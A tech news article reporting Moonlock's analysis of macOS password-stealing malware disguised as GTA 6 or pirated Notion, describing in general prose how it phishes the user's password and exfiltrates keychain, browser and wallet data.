It is only planned for 2025, but already, the highly anticipated GTA 6 whets the appetites, particularly of hackers, who use it to siphon passwords from macOS device keychains.
Malware that specifically targets macOS continues to gain notoriety as the popularity of Mac computers increases. In 2023 alone, 21 new malware variants were identified, an increase of 50% compared to 2022, according to a study carried out by Patrick Wardle of the Objective-See foundation.
The idea that hackers are not interested in Apple machines is therefore largely false, although in the past, just mentioning macOS meant being safe from all dangers, viruses and other malware. Today, not only are the number of malware attacks increasing, but they are becoming more and more sophisticated. This is why Clubic recommends that you include an antivirus on board your macOS.
During an in-depth analysis of fragmented samples of notable macOS malware, security experts at Moonlock revealed a program of worrying sophistication. Pretending to be the much anticipated GTA 6which had already circulated in the form of fake executables at the end of 2023, this malware deploys clever techniques to extract sensitive information, such as passwords stored in the user’s local keychain.
A Trojan horse disguised as GTA 6
Moonlock, the cybersecurity arm of MacPaw, has identified a new strain of malware as a variant of password stealing software (PSW). This is a type of malicious Trojan designed to collect usernames and passwords from infected machines and then transmit them to the malicious actor through a remote connection or email.
This malware camouflages itself by either pretending to be a copy of GTA 6, or by posing as a pirated version of Notion, note-taking software particularly known to owners of Apple machines. This social engineering technique exploits trust by using familiar names to trick users into downloading malware.
Be careful though! While all Macs come with macOS Gatekeeper, a built-in security mechanism that works in the background to prevent users from downloading unsigned applications from the Internet, potentially infected with malware, this feature can be bypassed simply by clicking with Right-clicking the DMG file and selecting “Open.” Hackers exploit this vulnerability by including instructions to trick the user into opening the malicious file.
A fake window inviting the user to give their password
When the DMG file is executed, it releases a Mach-O file named AppleApp. Moonlock explains that “AppleApp” then makes a GET request to a specific URL from a Russian IP address. If the connection is successful, the program begins downloading a partially obfuscated AppleScript and Bash payload. This payload is then executed directly from application memory, thereby bypassing the file system.
Once executed, the payload uses multiple approaches to achieve its malicious goals, including credential phishing, sensitive data targeting, system profiling, and data exfiltration.
The malware also deploys a clever tactic to access the local keychain database, which requires the user’s system password. It does this by simulating a fake helper application installation window, thereby exploiting the user’s trust to reveal their password.
Once this step is completed, the malware begins targeting keychain databases as well as other sensitive data sources. It scans system directories for valuable data such as cookies, form history and login information of popular web browsers. It also searches FileZilla’s list of recent servers, macOS Keychain databases, and cryptocurrency wallets.
Using sophisticated AppleScripts, the malware also establishes a secret folder in users’ home directories. All collected logins, passwords and keys are stored there waiting to be extracted from the infected system to an external server controlled by the cybercriminal. Little useful reminder: GTA 6 is not out yet.
Sources: 9to5mac, Moonlock, Objective-See
0